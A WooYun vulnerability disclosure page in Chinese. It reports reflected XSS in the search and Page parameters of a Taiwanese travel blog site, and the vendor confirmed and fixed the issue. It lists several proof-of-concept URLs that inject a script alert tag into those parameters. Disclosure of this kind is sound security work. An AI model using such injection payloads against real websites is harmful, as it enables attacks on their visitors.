当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
Via`s旅行札記某站多处存在XSS打包(臺灣地區)
相关厂商:
漏洞作者:
提交时间:
2016-01-17 10:19
修复时间:
2016-01-28 15:30
公开时间:
2016-01-28 15:30
漏洞类型:
XSS 跨站脚本攻击
危害等级:
自评Rank:
10
漏洞状态:
已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-17: 厂商已经确认,细节仅向厂商公开
2016-01-27: 细节向核心白帽子及相关领域专家公开
2016-01-28: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

Via's旅行札記某站多处存在XSS

详细说明:

Via's旅行札記主站多处存在XSS漏洞
1、

http://**.**.**.**/search.php?mode=subject&qstr=ss"><script>alert(1);</script>


此处是在参数qstr上,即搜索处。
2、主要集中存在于一个参数上---------Page,网站中所有的Page都能X,下面就列出了一部分

http://**.**.**.**/blog.php?ptype=guestbook&Page=1"><script>alert(1);</script>
http://**.**.**.**/minsu_city.php?city=pingtung&p=new&Page=2"><script>alert(1);</script>
http://**.**.**.**/index2.php?Page=4"><script>alert(1);</script>
http://**.**.**.**/hotels_city_area.php?city=chiayi&p=push&Page=1"><script>alert(1);</script>&zip=600
http://**.**.**.**/mobile/category_image.php?categoryid=24&Page=3"><script>alert(1);</script>

漏洞证明:

1.png


2.jpg


3.png


4.png


5.png


6.jpg


7.png


8.png


9.png

修复方案:

用户提交后,过滤掉危险字符

版权声明:转载请注明来源 toomi@乌云


>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2016-01-17 18:57

厂商回复:

感謝通報

最新状态:

2016-01-28:已修復